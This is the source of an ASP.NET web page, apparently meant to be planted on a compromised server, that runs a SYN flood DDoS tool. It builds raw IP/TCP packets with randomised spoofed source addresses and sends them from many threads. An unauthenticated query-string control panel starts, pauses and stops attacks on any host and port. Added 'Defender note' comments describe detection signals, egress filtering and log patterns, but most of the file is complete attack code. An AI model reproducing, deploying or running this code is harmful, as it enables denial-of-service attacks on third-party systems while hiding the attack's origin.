<%@ Page Language="C#" AutoEventWireup="true" ValidateRequest="false"%>
<%@ Import Namespace="System" %>
<%@ Import Namespace="System.Net" %>
<%@ Import Namespace="System.Net.Sockets" %>
<%@ Import Namespace="System.Threading" %>
<%@ Import Namespace="System.Runtime.InteropServices" %>
<SCRIPT runat="server">
//author : kj021320(nonamed)
//blog : http://blog.csdn.net/kj021320/
// Page-wide job list: every DDosAttack started through this page is appended here and is
// later addressed by its list index. The field is static, so it is shared by all requests
// handled by this page class; the visible handlers read and modify it without taking a lock.
static ArrayList jobScheduler = new ArrayList();//JOB Scheduler
//Attack control class
/// <summary>
/// One flood job: the target host and port, the number of worker threads, and a state
/// flag that the workers poll. Instances are created by the page's request handler from
/// query-string values and kept in the static jobScheduler list.
/// </summary>
/// <remarks>
/// Defender note: run() starts plain Thread objects and returns, so the workers keep
/// running inside the web server's worker process after the HTTP request that started
/// them has completed. They leave their loop only when state is set to 2 or when
/// synFlood records an error.
/// </remarks>
public class DDosAttack
{
// Target host name or address; passed unchanged to the syn constructor.
public string targetHost = "";
// Destination TCP port.
public ushort targetPort = 0;
// Number of worker threads run() creates.
public int attackThread = 0;
// Worker threads created by run(); not read anywhere else in the visible code.
Thread[] thread = null;
// Last error text; written by run() and by the workers, shown in the job table.
public string errMsg = "";
public int state = 0;//0 = running, 1 = paused, 2 = stopped
/// <summary>
/// Starts attackThread worker threads that all execute synFlood on one shared syn instance.
/// </summary>
/// <remarks>
/// The array allocation and the syn constructor run outside the try block, so an
/// exception from either propagates to the caller; only failures while creating or
/// starting threads are caught and recorded in errMsg.
/// </remarks>
public void run()
{
thread = new Thread[attackThread];
syn ddos = new syn(targetHost, targetPort);
try
{
for (int i = 0; i < attackThread; i++)
{
// Back-reference the workers use to read state and to report errMsg
// (assigned on every iteration, always to the same value).
ddos.father = this;
thread[i] = new Thread(new ThreadStart(ddos.synFlood));
thread[i].Start();
}
}
catch(Exception e)
{
errMsg = e.Message;
}
}
}
/// <summary>
/// Field layout of an IPv4 header without options, as filled in by syn.synFlood and
/// serialised by syn.ipto.
/// </summary>
public struct ipHeader
{
public byte ip_verlen; //4-bit header length + 4-bit IP version
public byte ip_tos; //8-bit type of service (TOS)
public ushort ip_totallength; //16-bit total packet length (bytes)
public ushort ip_id; //16-bit identification
public ushort ip_offset; //3-bit flags (original comment; the field itself is 16 bits wide)
public byte ip_ttl; //8-bit time to live (TTL)
public byte ip_protocol; //8-bit protocol (TCP, UDP, ICMP, etc.)
public ushort ip_checksum; //16-bit IP header checksum
public uint ip_srcaddr; //32-bit source IP address
public uint ip_destaddr; //32-bit destination IP address
}
/// <summary>
/// TCP pseudo-header; in this file it is only serialised by syn.pshto as input to the
/// TCP checksum and is not part of the buffer that is sent.
/// </summary>
public struct psdHeader
{
public uint saddr; //source address
public uint daddr; //destination address
public byte mbz; // set to 0 by synFlood
public byte ptcl; //protocol type
public ushort tcpl; //TCP length
}
/// <summary>
/// Field layout of a TCP header without options, as filled in by syn.synFlood and
/// serialised by syn.tchto.
/// </summary>
public struct tcpHeader
{
public ushort th_sport; //16-bit source port
public ushort th_dport; //16-bit destination port
public int th_seq; //32-bit sequence number
public uint th_ack; //32-bit acknowledgement number
public byte th_lenres; //4-bit header length / 6-bit reserved
public byte th_flag; //6-bit flags
public ushort th_win; //16-bit window size
public ushort th_sum; //16-bit checksum
public ushort th_urp; //16-bit urgent data offset
}
//The three structs above define the IP header, the TCP pseudo-header and the TCP header.
public class syn
{
private uint ip;
private ushort port;
private EndPoint ep;
private Socket sock;
private ipHeader iph;
private psdHeader psh;
private tcpHeader tch;
public DDosAttack father;
public Random rand;
/// <summary>
/// Adds the first <paramref name="size"/> 16-bit words of <paramref name="buffer"/>,
/// folds the bits above bit 15 back into the low 16 bits, and returns the bitwise
/// complement of the result truncated to 16 bits.
/// </summary>
/// <param name="buffer">Words to sum.</param>
/// <param name="size">Number of words to read from the start of the buffer.</param>
/// <returns>The 16-bit complemented sum.</returns>
public UInt16 checksum(UInt16[] buffer, int size)
{
Int32 cksum = 0;
int counter;
counter = 0;
while (size > 0)
{
// val is assigned but not used; the sum below reads the element again.
UInt16 val = buffer[counter];
cksum += Convert.ToInt32(buffer[counter]);
counter += 1;
size -= 1;
}
// Fold the carries: add the high half to the low half, then add any carry that produced.
cksum = (cksum >> 16) + (cksum & 0xffff);
cksum += (cksum >> 16);
return (UInt16)(~cksum);
}
//SYN attack class: constructor
/// <summary>
/// Resolves the target, stores its first address and the port, and opens a raw IPv4
/// socket with the HeaderIncluded option so that the IP header is supplied by this code.
/// </summary>
/// <param name="_ip">Host name or address string; resolved with Dns.GetHostByName.</param>
/// <param name="_port">Destination TCP port.</param>
/// <remarks>
/// Defender note: the DNS lookup for the supplied host and the creation of the raw socket
/// both happen in the web server's worker process. Raw sockets normally require
/// administrative rights on Windows, so this constructor is expected to throw under a
/// low-privilege application-pool identity (confirm for the deployment under
/// investigation). A raw socket owned by the worker process is a strong host-side
/// detection signal.
/// </remarks>
public syn(string _ip, ushort _port)
{
IPHostEntry ih = Dns.GetHostByName(_ip);
// Only the first resolved address is used.
ip = Convert.ToUInt32(ih.AddressList[0].Address);
IPEndPoint _ep = new IPEndPoint(ih.AddressList[0], _port);
port = _port;
ep = _ep;
ipHeader iph = new ipHeader();
psh = new psdHeader();
tch = new tcpHeader();
sock = new Socket(AddressFamily.InterNetwork, SocketType.Raw, ProtocolType.IP);
// With HeaderIncluded set, the IP header (including the source address) is taken
// from the buffer passed to SendTo rather than filled in by the stack.
sock.SetSocketOption(SocketOptionLevel.IP, SocketOptionName.HeaderIncluded, 1);
rand = new Random();
}
//Sends packets in a loop
/// <summary>
/// Worker loop run by every thread of a job: fills in the constant IP, pseudo-header and
/// TCP fields once, then repeatedly randomises source address, source port and sequence
/// number, recomputes both checksums, and sends the combined IP+TCP header buffer on the
/// raw socket.
/// </summary>
/// <remarks>
/// Control: sleeps in 5-second steps while father.state is 1 and leaves the loop when it
/// is 2. Any serialisation or send failure stores a message in father.errMsg and ends
/// this thread.
/// Defender notes: the source address is random per packet, so victim-side logs do not
/// identify the sending web server. Anti-spoofing egress filtering (BCP 38) at the
/// server's network edge drops such packets, and flow or firewall logs showing outbound
/// TCP SYNs whose source is not a local address point back to the compromised host.
/// The IP id, flags/offset, TTL, window and header-length values are constants, which
/// makes the traffic signaturable; derive the on-wire byte values from a packet capture,
/// because the fields are serialised with BitConverter in host byte order.
/// </remarks>
public void synFlood()
{
//iph.ip_verlen = (byte)(4 << 4 | sizeof(ipHeader) / sizeof(uint));
iph.ip_verlen = (byte)(4 << 4 | Marshal.SizeOf(iph) / Marshal.SizeOf(ip));
//IPv4 with a 20-byte IP header; this is always 69
iph.ip_tos = 0;
//0 is fine here
iph.ip_totallength = 0x2800;
//Total length of IP header + TCP header; 40 is the minimum, without TCP options. It would be 0028, but in network byte order it is reversed to 2800
iph.ip_id = 0x9B18;
//Value captured from traffic sent by IE and copied in as-is
iph.ip_offset = 0x40;
//Also captured from IE traffic
iph.ip_ttl = 64;
//Also taken from IE traffic; could equally be 128 or similar
iph.ip_protocol = 6;
//6 is TCP
iph.ip_checksum = UInt16.Parse("0");
//Written as 0 until the checksum has been computed
iph.ip_destaddr = ip;
//Destination address of the IP header is the target address passed in above
psh.daddr = iph.ip_destaddr;
//The TCP pseudo-header is used for the checksum; its destination address is the same as in the IP header
psh.mbz = 0;
//Reportedly 0 is fine here
psh.ptcl = 6;
//6 is TCP
psh.tcpl = 0x1400;
//Size of the TCP header, 20 bytes; it would be 0014, written as 1400 because of byte order
tch.th_dport = port;
//Target port, passed in above
tch.th_ack = 0;
//First packet, so there is no sequence number from the server yet: 0
//tch.th_lenres = (byte)((sizeof(tcpHeader) / 4 << 4 | 0));
tch.th_lenres = (byte)((Marshal.SizeOf(iph) / 4 << 4 | 0));
//TCP header length
tch.th_flag = 2;
//2 is SYN
tch.th_win = ushort.Parse("16614");
//Captured from IE traffic
tch.th_sum = UInt16.Parse("0");
//0 until computed
tch.th_urp = UInt16.Parse("0");
//Left at 0 (the original author notes that other tools vary this field)
while (true)
{
// state 1 = paused: poll every 5 seconds; state 2 = stopped: leave the loop.
while (father.state == 1) { Thread.Sleep(5000); }
if (father.state == 2) { break; }
string srcAddress = rand.Next(1, 255) + "." + rand.Next(1, 255) + "." + rand.Next(1, 255) + "." + rand.Next(1, 255);//random spoofed source IP
iph.ip_srcaddr = Convert.ToUInt32(IPAddress.Parse(srcAddress).Address);
psh.saddr = iph.ip_srcaddr;
ushort sourcePort = Convert.ToUInt16(rand.Next(1, 65535));
byte[] bt = BitConverter.GetBytes(sourcePort);
Array.Reverse(bt);
tch.th_sport = BitConverter.ToUInt16(bt, 0);
tch.th_seq = IPAddress.HostToNetworkOrder((int)rand.Next(-2147483646, 2147483646));
//The lines above randomly generate the source IP, source port and TCP sequence number and convert them to network byte order
iph.ip_checksum = 0;
tch.th_sum = 0;
//Inside the loop, both existing values must be reset to 0 each time before the checksums can be computed
//byte[] psh_buf = new byte[sizeof(psdHeader)];
byte[] psh_buf = new byte[Marshal.SizeOf(psh)];
Int32 index = 0;
//index = pshto(psh, psh_buf, sizeof(psdHeader));
index = pshto(psh, psh_buf, Marshal.SizeOf(psh));
if (index == -1)
{
father.errMsg="构造tcp伪首部错误";
return;
}
index = 0;
//byte[] tch_buf = new byte[sizeof(tcpHeader)];
byte[] tch_buf = new byte[Marshal.SizeOf(tch)];
//index = tchto(tch, tch_buf, sizeof(tcpHeader));
index = tchto(tch, tch_buf, Marshal.SizeOf(tch));
if (index == -1)
{
father.errMsg="构造tcp首部错误";
return;
}
index = 0;
// TCP checksum input: pseudo-header bytes followed by the TCP header bytes.
//byte[] tcphe = new byte[sizeof(psdHeader) + sizeof(tcpHeader)];
byte[] tcphe = new byte[Marshal.SizeOf(psh) + Marshal.SizeOf(tch)];
Array.Copy(psh_buf, 0, tcphe, index, psh_buf.Length);
index += psh_buf.Length;
Array.Copy(tch_buf, 0, tcphe, index, tch_buf.Length);
index += tch_buf.Length;
tch.th_sum = chec(tcphe, index);
index = 0;
// Serialise the TCP header again, now carrying the computed checksum.
//index = tchto(tch, tch_buf, sizeof(tcpHeader));
index = tchto(tch, tch_buf, Marshal.SizeOf(tch));
if (index == -1)
{
father.errMsg="构造tcp首部错误";
return;
}
index = 0;
//byte[] ip_buf = new byte[sizeof(ipHeader)];
byte[] ip_buf = new byte[Marshal.SizeOf(iph)];
//index = ipto(iph, ip_buf,sizeof(ipHeader));
index = ipto(iph, ip_buf, Marshal.SizeOf(iph));
if (index == -1)
{
father.errMsg="构造ip首部错误";
return;
}
index = 0;
// The IP checksum is computed over the IP header bytes followed by the TCP header bytes.
//byte[] iptcp = new byte[sizeof(ipHeader) + sizeof(tcpHeader)];
byte[] iptcp = new byte[Marshal.SizeOf(iph) + Marshal.SizeOf(tch)];
Array.Copy(ip_buf, 0, iptcp, index, ip_buf.Length);
index += ip_buf.Length;
Array.Copy(tch_buf, 0, iptcp, index, tch_buf.Length);
index += tch_buf.Length;
iph.ip_checksum = chec(iptcp, index);
index = 0;
// Serialise the IP header again, now carrying the computed checksum.
//index = ipto(iph, ip_buf, sizeof(tcpHeader));
index = ipto(iph, ip_buf, Marshal.SizeOf(tch));
if (index == -1)
{
father.errMsg="构造ip首部错误";
return;
}
index = 0;
Array.Copy(ip_buf, 0, iptcp, index, ip_buf.Length);
index += ip_buf.Length;
Array.Copy(tch_buf, 0, iptcp, index, tch_buf.Length);
index += tch_buf.Length;
//if (iptcp.Length != (sizeof(ipHeader) + sizeof(tcpHeader)))
if (iptcp.Length != (Marshal.SizeOf(iph) + Marshal.SizeOf(tch)))
{
father.errMsg="构造iptcp报文错误";
return;
}
try
{
//Socket.SendTo transmits the assembled packet
sock.SendTo(iptcp, ep);
}
catch
{
// Any send failure ends this worker; the exception details are discarded.
father.errMsg="发送错误";
return;
}
}
}
/// <summary>
/// Reads the first <paramref name="size"/> bytes of <paramref name="buffer"/> as 16-bit
/// words (the word count is size / 2 rounded up) and returns checksum() over those words.
/// </summary>
/// <param name="buffer">Serialised header bytes.</param>
/// <param name="size">Number of bytes to include.</param>
/// <returns>The value returned by checksum() for the converted words.</returns>
public UInt16 chec(byte[] buffer, int size)
{
Double double_length = Convert.ToDouble(size);
Double dtemp = Math.Ceiling(double_length / 2);
int cksum_buffer_length = Convert.ToInt32(dtemp);
UInt16[] cksum_buffer = new UInt16[cksum_buffer_length];
int icmp_header_buffer_index = 0;
for (int i = 0; i < cksum_buffer_length; i++)
{
// Each word is taken from two consecutive bytes in host byte order.
cksum_buffer[i] =
BitConverter.ToUInt16(buffer, icmp_header_buffer_index);
icmp_header_buffer_index += 2;
}
UInt16 u_cksum = checksum(cksum_buffer, cksum_buffer_length);
return u_cksum;
}
//The method above prepares the checksum calculation by converting the mixed-type data into an array of 16-bit words.
/// <summary>
/// Writes the fields of <paramref name="iph"/> into <paramref name="Buffer"/> in
/// declaration order, using BitConverter for the multi-byte fields.
/// </summary>
/// <param name="iph">Header values to serialise.</param>
/// <param name="Buffer">Destination array, written from offset 0.</param>
/// <param name="size">Expected number of bytes written.</param>
/// <returns>The number of bytes written, or -1 when that number differs from <paramref name="size"/>.</returns>
public Int32 ipto(ipHeader iph, byte[] Buffer, int size)
{
Int32 rtn = 0;
int index = 0;
// Turn every field into its own byte array first.
byte[] b_verlen = new byte[1];
b_verlen[0] = iph.ip_verlen;
byte[] b_tos = new byte[1];
b_tos[0] = iph.ip_tos;
byte[] b_totallen = BitConverter.GetBytes(iph.ip_totallength);
byte[] b_id = BitConverter.GetBytes(iph.ip_id);
byte[] b_offset = BitConverter.GetBytes(iph.ip_offset);
byte[] b_ttl = new byte[1];
b_ttl[0] = iph.ip_ttl;
byte[] b_protol = new byte[1];
b_protol[0] = iph.ip_protocol;
byte[] b_checksum = BitConverter.GetBytes(iph.ip_checksum);
byte[] b_srcaddr = BitConverter.GetBytes(iph.ip_srcaddr);
byte[] b_destaddr = BitConverter.GetBytes(iph.ip_destaddr);
// Then append them to the output one after another; index tracks the write offset.
Array.Copy(b_verlen, 0, Buffer, index, b_verlen.Length);
index += b_verlen.Length;
Array.Copy(b_tos, 0, Buffer, index, b_tos.Length);
index += b_tos.Length;
Array.Copy(b_totallen, 0, Buffer, index, b_totallen.Length);
index += b_totallen.Length;
Array.Copy(b_id, 0, Buffer, index, b_id.Length);
index += b_id.Length;
Array.Copy(b_offset, 0, Buffer, index, b_offset.Length);
index += b_offset.Length;
Array.Copy(b_ttl, 0, Buffer, index, b_ttl.Length);
index += b_ttl.Length;
Array.Copy(b_protol, 0, Buffer, index, b_protol.Length);
index += b_protol.Length;
Array.Copy(b_checksum, 0, Buffer, index, b_checksum.Length);
index += b_checksum.Length;
Array.Copy(b_srcaddr, 0, Buffer, index, b_srcaddr.Length);
index += b_srcaddr.Length;
Array.Copy(b_destaddr, 0, Buffer, index, b_destaddr.Length);
index += b_destaddr.Length;
// Length check happens after the copies, so the buffer has already been written.
if (index != size/* sizeof(IcmpPacket) */)
{
rtn = -1;
return rtn;
}
rtn = index;
return rtn;
}
//The method above converts the IP header into a byte array.
/// <summary>
/// Writes the fields of <paramref name="psh"/> into <paramref name="buffer"/> in
/// declaration order, using BitConverter for the multi-byte fields.
/// </summary>
/// <param name="psh">Pseudo-header values to serialise.</param>
/// <param name="buffer">Destination array, written from offset 0.</param>
/// <param name="size">Expected number of bytes written.</param>
/// <returns>The number of bytes written, or -1 when that number differs from <paramref name="size"/>.</returns>
public Int32 pshto(psdHeader psh, byte[] buffer, int size)
{
Int32 rtn;
int index = 0;
byte[] b_psh_saddr = BitConverter.GetBytes(psh.saddr);
byte[] b_psh_daddr = BitConverter.GetBytes(psh.daddr);
byte[] b_psh_mbz = new byte[1];
b_psh_mbz[0] = psh.mbz;
byte[] b_psh_ptcl = new byte[1];
b_psh_ptcl[0] = psh.ptcl;
byte[] b_psh_tcpl = BitConverter.GetBytes(psh.tcpl);
// Append the field arrays one after another; index tracks the write offset.
Array.Copy(b_psh_saddr, 0, buffer, index, b_psh_saddr.Length);
index += b_psh_saddr.Length;
Array.Copy(b_psh_daddr, 0, buffer, index, b_psh_daddr.Length);
index += b_psh_daddr.Length;
Array.Copy(b_psh_mbz, 0, buffer, index, b_psh_mbz.Length);
index += b_psh_mbz.Length;
Array.Copy(b_psh_ptcl, 0, buffer, index, b_psh_ptcl.Length);
index += b_psh_ptcl.Length;
Array.Copy(b_psh_tcpl, 0, buffer, index, b_psh_tcpl.Length);
index += b_psh_tcpl.Length;
if (index != size)
{
rtn = -1;
return rtn;
}
else
{
rtn = index;
return rtn;
}
}
//The method above converts the TCP pseudo-header into a byte array.
/// <summary>
/// Writes the fields of <paramref name="tch"/> into <paramref name="buffer"/> in
/// declaration order, using BitConverter for the multi-byte fields.
/// </summary>
/// <param name="tch">TCP header values to serialise.</param>
/// <param name="buffer">Destination array, written from offset 0.</param>
/// <param name="size">Expected number of bytes written.</param>
/// <returns>The number of bytes written, or -1 when that number differs from <paramref name="size"/>.</returns>
public Int32 tchto(tcpHeader tch, byte[] buffer, int size)
{
Int32 rtn;
int index = 0;
byte[] b_tch_sport = BitConverter.GetBytes(tch.th_sport);
byte[] b_tch_dport = BitConverter.GetBytes(tch.th_dport);
byte[] b_tch_seq = BitConverter.GetBytes(tch.th_seq);
byte[] b_tch_ack = BitConverter.GetBytes(tch.th_ack);
byte[] b_tch_lenres = new byte[1];
b_tch_lenres[0] = tch.th_lenres;
byte[] b_tch_flag = new byte[1];
b_tch_flag[0] = tch.th_flag;
byte[] b_tch_win = BitConverter.GetBytes(tch.th_win);
byte[] b_tch_sum = BitConverter.GetBytes(tch.th_sum);
byte[] b_tch_urp = BitConverter.GetBytes(tch.th_urp);
// Append the field arrays one after another; index tracks the write offset.
Array.Copy(b_tch_sport, 0, buffer, index, b_tch_sport.Length);
index += b_tch_sport.Length;
Array.Copy(b_tch_dport, 0, buffer, index, b_tch_dport.Length);
index += b_tch_dport.Length;
Array.Copy(b_tch_seq, 0, buffer, index, b_tch_seq.Length);
index += b_tch_seq.Length;
Array.Copy(b_tch_ack, 0, buffer, index, b_tch_ack.Length);
index += b_tch_ack.Length;
Array.Copy(b_tch_lenres, 0, buffer, index, b_tch_lenres.Length);
index += b_tch_lenres.Length;
Array.Copy(b_tch_flag, 0, buffer, index, b_tch_flag.Length);
index += b_tch_flag.Length;
Array.Copy(b_tch_win, 0, buffer, index, b_tch_win.Length);
index += b_tch_win.Length;
Array.Copy(b_tch_sum, 0, buffer, index, b_tch_sum.Length);
index += b_tch_sum.Length;
Array.Copy(b_tch_urp, 0, buffer, index, b_tch_urp.Length);
index += b_tch_urp.Length;
if (index != size)
{
rtn = -1;
return rtn;
}
else
{
rtn = index;
return rtn;
}
}
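//The method above converts the TCP header into a byte array; because it is needed twice, it is kept separate from the pseudo-header conversion.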
}
</SCRIPT>
<%
// Request dispatcher for the control panel. It runs only when the query string carries a
// non-empty Action value; otherwise the HTML below is served.
//
// Defender notes (all grounded in the branches below):
//  - No authentication or authorisation check is visible on any branch: whoever can reach
//    the URL can start, pause, resume or stop jobs.
//  - Every command is a GET query string, so it is recorded in the web server's request
//    log. Patterns to search for: Action=AddToAttack with host, port and thread
//    parameters; Action=del, Action=Pause or Action=Continue with an id parameter.
//  - host, port, thread and id are converted without validation and the Convert calls and
//    list indexing are not wrapped in try/catch here, so malformed values presumably
//    surface as error responses from this page (a secondary log indicator).
//  - targetHost and errMsg are written into the response without HTML encoding; treat the
//    rendered table as untrusted when examining a live panel.
string action = Request.QueryString["Action"];
if (action != null && !"".Equals(action))
{
if ("AddToAttack".Equals(action))
{
string host = Request.QueryString["host"];//host name
string port = Request.QueryString["port"];//port
string thread = Request.QueryString["thread"];//thread count
DDosAttack da = new DDosAttack();
da.targetHost = host;
da.targetPort = Convert.ToUInt16(port);
da.attackThread = Convert.ToInt32(thread);
// run() starts the worker threads before the job is registered in the list.
da.run();
jobScheduler.Add(da);
da = null;
}
else if("del".Equals(action))
{
string id = Request.QueryString["id"];
if(id!=null)
{
int num = Convert.ToInt32(id);
DDosAttack da = (DDosAttack)jobScheduler[num];
if (da!=null)
{
da.state = 2;//stops the worker threads
// Removing the entry shifts the indices of all later jobs down by one.
jobScheduler.RemoveAt(num);
}
da = null;
}
}
else if ("Pause".Equals(action))
{
string id = Request.QueryString["id"];
if(id!=null)
{
int num=Convert.ToInt32(id);
DDosAttack da = (DDosAttack)jobScheduler[num];
if(da!=null){da.state=1;}
da=null;
}
}
else if("Continue".Equals(action))
{
string id = Request.QueryString["id"];
if(id!=null)
{
int num=Convert.ToInt32(id);
DDosAttack da = (DDosAttack)jobScheduler[num];
if (da != null) { da.state = 0; }
da=null;
}
}
else
{
//display the job scheduler pool
// Reached for any other non-empty Action value; the page script polls this branch
// with a random number as the Action value.
Response.Write("<TABLE><TR><TD>JOB</TD><TD>THREAD</TD><TD>STATE</TD><TD>HOST</TD><TD>PORT</TD><TD>ERR MSG</TD><TD>ACTION</TD></TR>");
int count = jobScheduler.Count;
for (int i = 0; i < count;i++ )
{
jobScheduler.TrimToSize();
DDosAttack da = (DDosAttack)jobScheduler[i];
string dstate = "";
string operate = "";
if(da!=null)
{
switch (da.state)
{
case 0: dstate = "running"; operate = "<input type=button value=Pause onclick=\"ThreadOperate('Pause'," + i + ")\">"; break;
case 1: dstate = "pause"; operate = "<input type=button value=Continue onclick=\"ThreadOperate('Continue'," + i + ")\">"; break;
}
}
Response.Write("<TR><TD>" + i + "</TD><TD>" + da.attackThread + "</TD>");
Response.Write("<TD>" + dstate + "</TD><TD>" + da.targetHost + "</TD><TD>" + da.targetPort + "</TD>");
Response.Write("<TD>" + da.errMsg + "</TD><TD><input type=button value=Drop onclick='DropThread(" + i + ");'>" + operate + "</TD></TR>");
da = null;
}
Response.Write("</TABLE>");
}
// Command responses end here, so the HTML document below is not sent for them.
GC.Collect();
Response.End();
return;
}
%>
<html xmlns:v="urn:schemas-microsoft-com:vml">
<head><title>ISTO aspx-puppet-mummy</title>
<style type="text/css">
v\:*{behavior:url(#default#VML);position:absolute;}
body,td{font-size: 12px;}
body,td{font-size:12px;}
table{T:expression(this.border='1',this.borderColorLight='Black',this.borderColorDark='White');}
input,select{font-size:12px;color:#000000;}
input{border-color:"#000000";color:#008800;background-color:#333333;}
body{margin-left:0px;margin-top:0px;margin-right:0px;margin-bottom:0px;}
td{white-space:nowrap;}
a{color:black;text-decoration:none; color:#008800;}
</style>
<script language="javascript">
//common
// Removes leading and trailing whitespace from the string.
String.prototype.trim = function()
{
return this.replace(/(^\s*)|(\s*$)/g, "");
}
// Removes leading whitespace only.
String.prototype.ltrim = function()
{
return this.replace(/(^\s*)/g, "");
}
// Removes trailing whitespace only.
String.prototype.rtrim = function()
{
return this.replace(/(\s*$)/g, "");
}
// Assigns a request object to the implicit global xmlHttp: an Msxml2.XMLHTTP ActiveX
// object when window.ActiveXObject exists; the else-branch tests the property name
// exactly as spelled below. The single global is shared by every request this page makes.
function createXmlHttpRequest(){//create AJAX CONSOLES
if(window.ActiveXObject){
xmlHttp=new ActiveXObject("Msxml2.XMLHTTP");
}else if(window.XMLHttpRequst){
xmlHttp=new XMLHttpRequst();
}
}
//ref: the element that needs the information (it receives the response text)
// Ready-state callback: once the request has completed with HTTP 200, trims the response
// text, writes it into ref.innerHTML when it is non-empty and ref is given, and returns it.
// Returns "" in every other case. The response is inserted as HTML without escaping.
function getTheMessage(ref){
if(xmlHttp.readyState==4){
if(xmlHttp.status==200){
var replaceStr;
replaceStr=xmlHttp.responseText;
replaceStr=replaceStr.trim();
if(replaceStr!=""&&ref){
ref.innerHTML=replaceStr;
}
return replaceStr;
}else{
return "";
}
}else{
return "";
}
}
//str:connection HTTP URL
//code:eval the code
// Sends an asynchronous GET to str and evaluates the string code with eval() on every
// ready-state change. All callers on this page pass an empty string as code.
function openUrlXmlHttpRequstEval(str,code){
url=str;
createXmlHttpRequest();
xmlHttp.open("get",url,true);
xmlHttp.onreadystatechange=function tmp(){eval(code);};
xmlHttp.send();
}
//str:connection HTTP URL
//ref:replace the HTML consoles
// Sends an asynchronous GET to str and hands each ready-state change to getTheMessage,
// which replaces the content of ref with the response once it has arrived.
function openUrlXmlHttpRequstReplace(str,ref){
url=str;
createXmlHttpRequest();
xmlHttp.open("get",url,true);
xmlHttp.onreadystatechange=function tmp(){getTheMessage(ref);};
xmlHttp.send();
}
</script>
<script language="javascript">
//user define functions
//add to scan
// Click handler of the form button. Checks that host is non-empty and that port is a
// number from 1 to 65535, then issues the AddToAttack request and clears both fields.
// Defender notes: although the form declares method="POST", the command is sent as a GET
// with the values concatenated into the query string without URL-encoding, followed by a
// bare Math.random() value as cache-buster, so each command leaves a distinctive
// query string in the server's request log. The success alert is shown immediately,
// before any response has been received.
function post(){
if(S.host.value!=""){
if(parseInt(S.port.value)<=65535){
if(!isNaN(S.port.value)&&parseInt(S.port.value)>0){
var url="?Action=AddToAttack&host="+S.host.value+"&thread="+S.thread.value+"&port="+S.port.value+"&"+Math.random();
openUrlXmlHttpRequstEval(url,"");S.port.value="";S.host.value="";
alert("add success");
}else{
alert("set port error");
}
}else{
alert("set port error");
}
}else{
alert("HOST can't empty");
}
}
//view pool
// Refreshes the job table: requests the page with a random number as the Action value
// (which the server-side dispatcher treats as "list jobs") and puts the returned HTML
// into the element with id "pool". In request logs this appears as Action=<decimal fraction>.
function viewSchedulerPool(){
openUrlXmlHttpRequstReplace("?Action="+Math.random(),document.all.pool);
}
//drop the scanning Thread
// After a confirmation dialog, sends Action=del for the job at list index num,
// with a bare Math.random() value appended as cache-buster.
function DropThread(num){
if(confirm('Are U sure?')){
var url="?Action=del&id="+num+"&"+Math.random();
openUrlXmlHttpRequstEval(url,"");
}
}
// After a confirmation dialog, sends the action named by ope for the job at list index
// id. The job table generated by the server passes 'Pause' or 'Continue' as ope.
function ThreadOperate(ope,id){
if(confirm('Are U sure?')){
var url="?Action="+ope+"&id="+id+"&"+Math.random();
openUrlXmlHttpRequstEval(url,"");
}
}
// Polls the job table every 3 seconds for as long as the page stays open, which shows up
// in the server's request log as a steady stream of requests to this page from the
// operator's address.
setInterval("viewSchedulerPool()",3000);
</script>
</head>
<body text="#00ff00" vLink="#008000" aLink="#008000" link="#008000" bgColor="#000000" style="background:url(http://p.blog.csdn.net/images/p_blog_csdn_net/kj021320/302272/o_puppet-mummy.jpg) no-repeat center center;">
<center>
Scheduler Pool:
<div id="pool"></div>
<hr />
<form method="POST" name='S'>
HOST:<input type="text" name="host" />
D-PORT:<input type="text" name="port" size="4" maxlength="5" />
THREAD:<select name="thread"><option value="1">1</option><option value="3">3</option><option value="5">5</option><option value="10">10</option><option value="20">20</option><option value="30">30</option><option value="50">50</option></select>
<input type="button" value="AddToAttack" name="Action" onclick="post();" />
</form>
</center>
<v:Textbox id="istoFullname" style='FONT-SIZE:30;Z-INDEX:3201;FILTER:alpha(opacity=100,style=2) blur(add=0,direction=14,strength=5) wave(add=1,freq=,lightstrength=5,phase=5,strength=2) glow(color=#d9f281,strength=3) ;LEFT:10%;COLOR:#f17a35;FONT-FAMILY:@黑体;TOP:35%' inset='5pt,5pt,5pt,5pt'> - = Information Security Technology Organization = - </v:Textbox>
<a onclick="javascript:window.open('http://www.isto.cn');">
<v:Textbox id="isto" style="FONT-SIZE:80;Z-INDEX:3177;FILTER:alpha(opacity=100,style=2) blur(add=0,direction=14,strength=5) wave(add=1,freq=,lightstrength=5,phase=5,strength=8) glow(color=#cbb749,strength=1) invert;LEFT:23%;COLOR:black;WORD-BREAK:break-all;FONT-FAMILY:Arial Black;TOP:45%" inset="5pt,5pt,5pt,5pt" print="false">-= I.S.T.O =-</v:Textbox>
</a>
</body>
</html>